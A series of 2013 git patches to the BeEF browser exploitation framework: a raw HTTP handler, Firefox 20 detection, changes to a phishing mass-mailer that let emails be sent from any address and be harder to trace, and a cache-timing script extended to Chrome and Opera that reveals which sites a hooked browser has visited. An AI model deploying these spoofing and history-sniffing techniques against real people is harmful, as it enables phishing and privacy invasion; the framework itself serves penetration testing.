 1 file changed, 1 deletion(-)

diff --git a/modules/browser/detect_toolbars/config.yaml b/modules/browser/detect_toolbars/config.yaml
index abbac341c..f019c1031 100644
--- a/modules/browser/detect_toolbars/config.yaml
+++ b/modules/browser/detect_toolbars/config.yaml
@@ -13,4 +13,3 @@ beef:
             authors: ["gcattani"]
             target:
                 working: ["All"]
-                not_working: ["All"]

From 0d8521dd7b1270b432babb0481cc76c0b4067f7a Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 23 Feb 2013 16:57:47 +1030
Subject: [PATCH 218/397] Add 'bind_raw' to asset handler

---
 core/bootstrap.rb                            |  1 +
 core/main/network_stack/assethandler.rb      | 18 +++++++++++
 core/main/network_stack/handlers/raw.rb      | 33 ++++++++++++++++++++
 modules/debug/test_http_bind_raw/command.js  | 11 +++++++
 modules/debug/test_http_bind_raw/config.yaml | 15 +++++++++
 modules/debug/test_http_bind_raw/module.rb   | 20 ++++++++++++
 modules/debug/test_http_redirect/command.js  | 11 +++++++
 modules/debug/test_http_redirect/config.yaml | 15 +++++++++
 modules/debug/test_http_redirect/module.rb   | 18 +++++++++++
 9 files changed, 142 insertions(+)
 create mode 100644 core/main/network_stack/handlers/raw.rb
 create mode 100644 modules/debug/test_http_bind_raw/command.js
 create mode 100644 modules/debug/test_http_bind_raw/config.yaml
 create mode 100644 modules/debug/test_http_bind_raw/module.rb
 create mode 100644 modules/debug/test_http_redirect/command.js
 create mode 100644 modules/debug/test_http_redirect/config.yaml
 create mode 100644 modules/debug/test_http_redirect/module.rb

diff --git a/core/bootstrap.rb b/core/bootstrap.rb
index cf23f03e3..71dcfb88c 100644
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -25,6 +25,7 @@ require 'core/main/handlers/browserdetails'
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
 require 'core/main/network_stack/handlers/redirector'
+require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 
diff --git a/core/main/network_stack/assethandler.rb b/core/main/network_stack/assethandler.rb
index fdd8ebff2..0509c4731 100644
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -38,6 +38,24 @@ module Handlers
       url
     end
 
+    # Binds raw HTTP to a mount point
+    # @param [Integer] status HTTP status code to return
+    # @param [String] headers HTTP headers as a JSON string to return
+    # @param [String] body HTTP body to return
+    # @param [String] path URL path to mount the asset to TODO (can be nil for random path)
+    # @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
+    def bind_raw(status, header, body, path=nil, count=-1)
+      url = build_url(path,nil)
+      @allocations[url] = {}
+      @http_server.mount(
+        url,
+        BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
+      )
+      @http_server.remap
+      print_info "Raw HTTP bound to url [" + url + "]"
+      url
+    end
+
     # Binds a file to a mount point
     # @param [String] file File path to asset
     # @param [String] path URL path to mount the asset to (can be nil for random path)
diff --git a/core/main/network_stack/handlers/raw.rb b/core/main/network_stack/handlers/raw.rb
new file mode 100644
index 000000000..03e2514ae
--- /dev/null
+++ b/core/main/network_stack/handlers/raw.rb
@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        class Raw
+
+	        def initialize(status, header={}, body)
+	        	@status  = status
+	                @header  = header
+	                @body    = body
+	        end
+
+	        def call(env)
+	            [@status, @header, @body]
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end
diff --git a/modules/debug/test_http_bind_raw/command.js b/modules/debug/test_http_bind_raw/command.js
new file mode 100644
index 000000000..5339386e7
--- /dev/null
+++ b/modules/debug/test_http_bind_raw/command.js
@@ -0,0 +1,11 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /beef');
+
+});
diff --git a/modules/debug/test_http_bind_raw/config.yaml b/modules/debug/test_http_bind_raw/config.yaml
new file mode 100644
index 000000000..8c4561ce3
--- /dev/null
+++ b/modules/debug/test_http_bind_raw/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_http_bind_raw:
+            enable: true
+            category: "Debug"
+            name: "Test HTTP Bind Raw"
+            description: "Test the HTTP 'bind_raw' handler."
+            authors: ["bcoles"]
+            target:
+                 working: ["All"]
diff --git a/modules/debug/test_http_bind_raw/module.rb b/modules/debug/test_http_bind_raw/module.rb
new file mode 100644
index 000000000..5eb456845
--- /dev/null
+++ b/modules/debug/test_http_bind_raw/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_http_bind_raw < BeEF::Core::Command
+
+  def pre_send
+    configuration = BeEF::Core::Configuration.instance
+    xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1)
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end
diff --git a/modules/debug/test_http_redirect/command.js b/modules/debug/test_http_redirect/command.js
new file mode 100644
index 000000000..c1f8d8f53
--- /dev/null
+++ b/modules/debug/test_http_redirect/command.js
@@ -0,0 +1,11 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /redirect');
+
+});
diff --git a/modules/debug/test_http_redirect/config.yaml b/modules/debug/test_http_redirect/config.yaml
new file mode 100644
index 000000000..5eaf0aa11
--- /dev/null
+++ b/modules/debug/test_http_redirect/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_http_redirect:
+            enable: true
+            category: "Debug"
+            name: "Test HTTP Redirect"
+            description: "Test the HTTP 'redirect' handler."
+            authors: ["bcoles"]
+            target:
+                 working: ["All"]
diff --git a/modules/debug/test_http_redirect/module.rb b/modules/debug/test_http_redirect/module.rb
new file mode 100644
index 000000000..49caa7613
--- /dev/null
+++ b/modules/debug/test_http_redirect/module.rb
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_http_redirect < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect')
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end

From 127e3cc0bb19901c6718d11a4061fb5cce03e724 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 26 Feb 2013 12:08:05 +1030
Subject: [PATCH 219/397] Updated version

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index d418b2998..1ec6e22dc 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.2.1-alpha
+0.4.4.3-alpha
diff --git a/config.yaml b/config.yaml
index aa801ecc2..3b95ff0de 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.2.1-alpha'
+    version: '0.4.4.3-alpha'
     debug: false
 
     restrictions:

From 83749aad087da06fc3af608bb1a38ace0b500374 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 26 Feb 2013 13:17:14 +1030
Subject: [PATCH 220/397] Add support for Firefox 20

---
 core/main/client/browser.js | 17 +++++++++++++++--
 1 file changed, 15 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index aa8389603..5e9cf91b3 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -225,15 +225,23 @@ beef.browser = {
      * @example: beef.browser.isFF19()
      */
     isFF19:function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/19\./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null;
     },
 
+	/**
+	 * Returns true if FF20
+	 * @example: beef.browser.isFF20()
+	 */
+	isFF20:function () {
+		return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
+	},
+
     /**
      * Returns true if FF.
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20();
     },
 
     /**
@@ -535,6 +543,7 @@ beef.browser = {
             FF17:this.isFF17(), // Firefox 17
             FF18:this.isFF18(), // Firefox 18
             FF19:this.isFF19(), // Firefox 19
+			FF20:this.isFF20(), // Firefox 20
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -727,6 +736,10 @@ beef.browser = {
             return '19'
         }
         ;    // Firefox 19
+		if (this.isFF20()) {
+			return '20'
+		}
+		;	// Firefox 20
 
         if (this.isIE6()) {
             return '6'

From e79372f8ac7d0c8652d5d06f65b058fd63bf78ce Mon Sep 17 00:00:00 2001
From: geefunkmasterpro <geefunkmasterpro@gmail.com>
Date: Wed, 27 Feb 2013 21:33:48 +1100
Subject: [PATCH 221/397] Added auth field to config so that emails are harder
 to track to sender

Added error handling to identify:
  - errors creating the mail headers
  - errors processing JSON input
  - errors in the mailer configuration
---
 extensions/social_engineering/config.yaml     |  3 +-
 .../mass_mailer/mass_mailer.rb                | 53 +++++++++++--------
 .../rest/socialengineering.rb                 | 13 +++--
 3 files changed, 41 insertions(+), 28 deletions(-)

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index a2b03233f..4a2d0af37 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -21,8 +21,9 @@ beef:
                 use_auth: true
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "youruser@gmail.com"
+                auth: "youruser@gmail.com"
                 password: "yourpass"
+                from: "fromemail@gmail.com"
                 # available templates
                 templates:
                     default:
diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index c62ebf7c8..aa586fe13 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -20,8 +20,9 @@ module BeEF
           @host = @config.get("#{@config_prefix}.host")
           @port = @config.get("#{@config_prefix}.port")
           @helo = @config.get("#{@config_prefix}.helo")
-          @from = @config.get("#{@config_prefix}.from")
+          @auth = @config.get("#{@config_prefix}.auth")
           @password = @config.get("#{@config_prefix}.password")
+          @from = @config.get("#{@config_prefix}.from")
         end
 
         # tos_hash is an Hash like:
@@ -47,7 +48,7 @@ module BeEF
           smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
 
           if @config.get("#{@config_prefix}.use_auth")
-            smtp.start(@helo, @from, @password, :login) do |smtp|
+            smtp.start(@helo, @auth, @password, :login) do |smtp|
               tos_hash.each do |to, name|
                 message = compose_email(fromname, to, name, subject, link, linktext, template)
                 smtp.send_message(message, @from, to)
@@ -68,32 +69,38 @@ module BeEF
         end
 
         def compose_email(fromname, to, name, subject, link, linktext, template)
-           msg_id = random_string(50)
-           boundary = "------------#{random_string(24)}"
-           rel_boundary = "------------#{random_string(24)}"
+          begin
+            msg_id = random_string(50)
+            boundary = "------------#{random_string(24)}"
+            rel_boundary = "------------#{random_string(24)}"
 
-           header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
-           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
-           rel_header = email_related(rel_boundary)
-           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           images = ""
-           @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
-             images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
-           end
+            header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
+            plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
+            rel_header = email_related(rel_boundary)
+            html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           attachments = ""
-           if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
-             @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
-               attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
-             end
-           end
+            images = ""
+            @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
+              images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
+            end
 
-           close = email_close(boundary)
+            attachments = ""
+            if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
+              @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
+                 attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+              end
+            end
 
-           message = header + plain_body + rel_header + html_body + images + attachments + close
-           print_debug "Raw Email content:\n #{message}"
-           message
+            close = email_close(boundary)
+          rescue Exception => e
+            print_error "Error constructing email."
+            raise
+          end
+
+          message = header + plain_body + rel_header + html_body + images + attachments + close
+          print_debug "Raw Email content:\n #{message}"
+          message
         end
 
         def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index b03447145..8bc5f6ffb 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -106,11 +106,16 @@ module BeEF
                 halt 401
               end
             end
-
-          mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
-          mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
           rescue Exception => e
-            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
+            error 400
+          end
+
+          begin
+            mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+            mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
+          rescue Exception => e
+            print_error "Invalid mailer configuration"
             error 400
           end
         end

From 66d0e3535b4a924673e968f033504a95b67f3d8c Mon Sep 17 00:00:00 2001
From: geefunkmasterpro <geefunkmasterpro@gmail.com>
Date: Wed, 27 Feb 2013 23:29:08 +1100
Subject: [PATCH 222/397] Added fromaddr to mass mailer JSON interface so
 emails can be sent from any address without restart.

Removed fromaddr entry from config.yaml.
---
 extensions/social_engineering/config.yaml     |  1 -
 .../mass_mailer/mass_mailer.rb                | 19 +++++++++----------
 .../rest/socialengineering.rb                 |  6 ++++--
 3 files changed, 13 insertions(+), 13 deletions(-)

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index 4a2d0af37..be302af75 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -23,7 +23,6 @@ beef:
                 helo: "gmail.com" # this is usually the domain name
                 auth: "youruser@gmail.com"
                 password: "yourpass"
-                from: "fromemail@gmail.com"
                 # available templates
                 templates:
                     default:
diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index aa586fe13..3ab99ad17 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -22,13 +22,12 @@ module BeEF
           @helo = @config.get("#{@config_prefix}.helo")
           @auth = @config.get("#{@config_prefix}.auth")
           @password = @config.get("#{@config_prefix}.password")
-          @from = @config.get("#{@config_prefix}.from")
         end
 
         # tos_hash is an Hash like:
         # 'antisnatchor@gmail.com' => 'Michele'
         # 'ciccio@pasticcio.com' => 'Ciccio'
-        def send_email(template, fromname, subject, link, linktext, tos_hash)
+        def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
           # create new SSL context and disable CA chain validation
           if @config.get("#{@config_prefix}.use_tls")
             @ctx = OpenSSL::SSL::SSLContext.new
@@ -38,7 +37,7 @@ module BeEF
 
           n = tos_hash.size
           x = 1
-          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
+          print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
           print_info "subject: #{subject}"
           print_info "link: #{link}"
           print_info "linktext: #{linktext}"
@@ -50,17 +49,17 @@ module BeEF
           if @config.get("#{@config_prefix}.use_auth")
             smtp.start(@helo, @auth, @password, :login) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
             end
           else
-            smtp.start(@helo, @from) do |smtp|
+            smtp.start(@helo, @auth) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
@@ -68,14 +67,14 @@ module BeEF
           end
         end
 
-        def compose_email(fromname, to, name, subject, link, linktext, template)
+        def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
           begin
             msg_id = random_string(50)
             boundary = "------------#{random_string(24)}"
             rel_boundary = "------------#{random_string(24)}"
 
 
-            header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
+            header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
             plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
             rel_header = email_related(rel_boundary)
             html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index 8bc5f6ffb..d424644f0 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -70,6 +70,7 @@ module BeEF
         #    "template": "default",
         #    "subject": "Hi from BeEF",
         #    "fromname": "BeEF",
+        #    "fromaddr": "beef@beef.com",
         #    "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
         #    "linktext": "http://beefproject.com",
         #    "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
             template = body["template"]
             subject = body["subject"]
             fromname = body["fromname"]
+            fromaddr = body["fromaddr"]
             link = body["link"]
             linktext = body["linktext"]
 
-            if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
+            if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
               print_error "All parameters are mandatory."
               halt 401
             end
@@ -113,7 +115,7 @@ module BeEF
 
           begin
             mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
-            mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
+            mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
           rescue Exception => e
             print_error "Invalid mailer configuration"
             error 400

From 6f035bdf05e4fda3c533687df92edbe4e08a952d Mon Sep 17 00:00:00 2001
From: Jonathan Claudius <jclaudius@trustwave.com>
Date: Sat, 2 Mar 2013 17:32:44 -0600
Subject: [PATCH 223/397] Add .rvmrc to .gitignore

---
 .gitignore | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.gitignore b/.gitignore
index 26a021ee6..7494b2b02 100644
--- a/.gitignore
+++ b/.gitignore
@@ -3,3 +3,4 @@ test/msf-test
 custom-config.yaml
 .DS_Store
 .gitignore
+.rvmrc

From 0ea1c0bbf81b3585e51d18a6f7e819b599938dc4 Mon Sep 17 00:00:00 2001
From: qswain2 <qswain2@washcoll.edu>
Date: Tue, 12 Feb 2013 21:57:41 -0500
Subject: [PATCH 224/397] Add chrome/opera support to get_visited_domains

Added chrome/opera support for lcamtuf cache timing script
in get_visited_domains module.

Signed-off-by: antisnatchor <antisnatchor@gmail.com>
---
 .../browser/get_visited_domains/command.js    | 90 ++++++++++++++++++-
 1 file changed, 87 insertions(+), 3 deletions(-)

diff --git a/modules/browser/get_visited_domains/command.js b/modules/browser/get_visited_domains/command.js
index 9405ebbe3..29fa1500f 100644
--- a/modules/browser/get_visited_domains/command.js
+++ b/modules/browser/get_visited_domains/command.js
@@ -16,6 +16,8 @@ var tries = 0;
 
 var isIE = 0;
 var isFF = 0;
+var isO = 0;
+var isC = 0;
 
 /*******************************
  * SUB-MS TIMER IMPLEMENTATION *
@@ -131,6 +133,56 @@ if (beef.browser.isIE() == 1) {
 	var MAX_ATTEMPTS = 1;	
 }
 
+if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+    /****************
+	 * SCANNED URLS *
+	 ****************/
+	var targets = [
+	  { 'category': 'Social networks' },
+	  { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
+									  'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
+									  'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
+	  { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
+	
+	  { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
+									 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
+	  { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
+	  { 'category': 'Content platforms' },
+	  { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
+	  { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
+	  { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
+	  { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
+	  { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
+	  { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
+	  { 'category': 'Online media' },
+	  { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
+	  { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
+								 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
+	  { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
+	  { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
+	  { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
+	  { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
+	  { 'category': 'Commerce' },
+	  { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
+										 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
+	  { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
+	  { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
+	  { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
+	  { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
+      { 'category': 'Coding' },
+      { 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
+      { 'category': 'Security' },
+      { 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
+      { 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
+      { 'category': 'Email' },
+      { 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
+	];
+	/*************************
+	 * CONFIGURABLE SETTINGS *
+	 *************************/
+	var TIME_LIMIT = 3;
+	var MAX_ATTEMPTS = 1;	
+}
 
 function sched_call(fn) {
   exec_next = fn;
@@ -160,7 +212,9 @@ function perform_check() {
   if (beef.browser.isFF() == 1) {
   	setTimeout(wait_for_read, 1);
   }
-  
+  if(beef.browser.isC() == 1 || beef.browser.isO() == 1){
+    setTimeout(wait_for_read, 1);
+  } 
 }
 
 
@@ -188,6 +242,19 @@ function wait_for_read() {
 		setTimeout(wait_for_read, 0);
 	  }	
    }
+   if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+      try{
+        if(frames['f'].location.href != 'about:blank'){ 
+            throw 1;
+        }
+        
+        frames['f'].stop();
+        document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
+        setTimeout(wait_for_read2, 1);
+      } catch(e){
+        setTimeout(wait_for_read, 1);
+      }
+   }
 }
 
 function wait_for_read2() {
@@ -213,6 +280,9 @@ function navigate_to_target() {
   if (beef.browser.isIE() == 1) {
 	  setTimeout(wait_for_noread, 0);
   }
+  if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+      setTimeout(wait_for_noread, 1);
+  }
   urls++;
   document.getElementById("f").src = current_url;
 }
@@ -248,6 +318,17 @@ function wait_for_noread() {
     	}	
     	sched_call(wait_for_noread);    	
 	}
+    if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+       if (frames['f'].location.href == undefined){
+           confirm_visited = true;
+           throw 1;
+       }
+       if (cycles++ >= TIME_LIMIT) {
+           maybe_test_next();
+           return;
+       }
+        setTimeout(wait_for_noread, 1);
+     }
   } catch (e) {
     confirmed_visited = true;
     maybe_test_next();
@@ -262,6 +343,9 @@ function maybe_test_next() {
   if (beef.browser.isIE() == 1) {
   	   document.getElementById("f").src = 'about:blank';
   }
+  if (beef.browser.isC() == 1 || beef.browser.isO() == 1) {
+      document.getElementById('f').src = 'about:blank';
+  }
   if (target_off < targets.length) {
     if (targets[target_off].category) {
       //log_text(targets[target_off].category + ':', 'p', 'category');
@@ -312,7 +396,7 @@ function reload(){
 /* The handler for "run the test" button on the main page. Dispenses
    advice, resets state if necessary. */
 function start_stuff() {
-  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
+  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) {
   	  target_off = 0;
 	  attempt = 0;
 	  confirmed_visited = false;
